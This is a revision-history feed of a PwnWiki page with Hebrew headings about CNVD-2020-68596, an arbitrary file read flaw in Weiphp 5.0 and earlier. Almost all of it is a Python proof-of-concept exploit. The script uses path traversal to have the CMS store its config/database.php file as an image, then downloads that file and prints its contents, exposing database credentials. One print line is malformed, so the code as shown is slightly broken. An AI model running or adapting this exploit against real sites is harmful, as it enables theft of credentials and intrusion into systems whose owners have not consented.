https://pwnwiki.com/index.php?action=history&feed=atom&title=CNVD-2020-68596_Weiphp5.0_%E5%89%8D%E5%8F%B0%E6%96%87%E4%BB%B6%E4%BB%BB%E6%84%8F%E8%AE%80%E5%8F%96%E6%BC%8F%E6%B4%9E%2Fhe
CNVD-2020-68596 Weiphp5.0 前台文件任意讀取漏洞/he - Revision history
2026-04-05T12:17:57Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=CNVD-2020-68596_Weiphp5.0_%E5%89%8D%E5%8F%B0%E6%96%87%E4%BB%B6%E4%BB%BB%E6%84%8F%E8%AE%80%E5%8F%96%E6%BC%8F%E6%B4%9E/he&diff=4472&oldid=prev
Pwnwiki: Created page with "== השפעת פגיעות =="
2021-06-09T10:30:16Z
<p>Created page with "== השפעת פגיעות =="</p>
<p><b>New page</b></p><div><languages /><br />
<br />
== השפעת פגיעות ==<br />
<pre><br />
Weiphp <= 5.0<br />
</pre><br />
<br />
==POC==<br />
<pre><br />
#!/usr/bin/python3<br />
#-*- coding:utf-8 -*-<br />
# author : PeiQi<br />
# from : http://wiki.peiqi.tech<br />
<br />
<br />
import requests<br />
import random<br />
import re<br />
<br />
<br />
def title():<br />
print('+------------------------------------------')<br />
print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m')<br />
print('+ \033[34mGithub : https://github.com/PeiQi0 \033[0m')<br />
print('+ \033[34m公众号 : PeiQi文库 \033[0m') \033[0m')<br />
print('+ \033[34mVersion: Weiphp5.0 \033[0m')<br />
print('+ \033[36m使用格式: python3 poc.py \033[0m')<br />
print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m')<br />
print('+------------------------------------------')<br />
<br />
def POC_1(target_url):<br />
upload_url = target_url + "/public/index.php/material/Material/_download_imgage?media_id=1&picUrl=./../config/database.php"<br />
headers = {<br />
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36"<br />
}<br />
data = {<br />
"1":1<br />
}<br />
try:<br />
response = requests.post(url=upload_url, headers=headers, data=data, timeout=20)<br />
if response.status_code == 200:<br />
print("\033[32m[o] 成功将 database.php文件 写入Pictrue表中\033[0m")<br />
else:<br />
print("\033[31m[x] 漏洞利用失败 \033[0m")<br />
except:<br />
print("\033[31m[x] 漏洞利用失败 \033[0m")<br />
<br />
def POC_2(target_url):<br />
vnln_url = target_url + "/public/index.php/home/file/user_pics"<br />
headers = {<br />
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36"<br />
}<br />
try:<br />
response = requests.get(url=vnln_url, headers=headers).text<br />
href = re.findall(r'<img src="(.*?)"', response)<br />
for i in href:<br />
print("\033[32m[o] 得到敏感文件url:{}\033[0m".format(i))<br />
data = requests.get(url=i, headers=headers)<br />
path = str(random.randint(1,999)) + '.php'<br />
with open(path, 'wb') as f:<br />
f.write(data.content)<br />
print("\033[32m[o] 成功下载文件为:{}\033[0m".format(path))<br />
print("\033[32m[o] 文件内容为:\n\033[0m{}".format(data.text))<br />
except:<br />
print("\033[31m[x] 获取文件名失败 \033[0m")<br />
<br />
<br />
<br />
if __name__ == '__main__':<br />
title()<br />
target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))<br />
POC_1(target_url)<br />
image_url = POC_2(target_url)<br />
</pre><br />
== הפניה ==<br />
http://wiki.peiqi.tech/PeiQi_Wiki/CMS%E6%BC%8F%E6%B4%9E/Weiphp/Weiphp5.0%20%E5%89%8D%E5%8F%B0%E6%96%87%E4%BB%B6%E4%BB%BB%E6%84%8F%E8%AF%BB%E5%8F%96%20CNVD-2020-68596.html</div>
Pwnwiki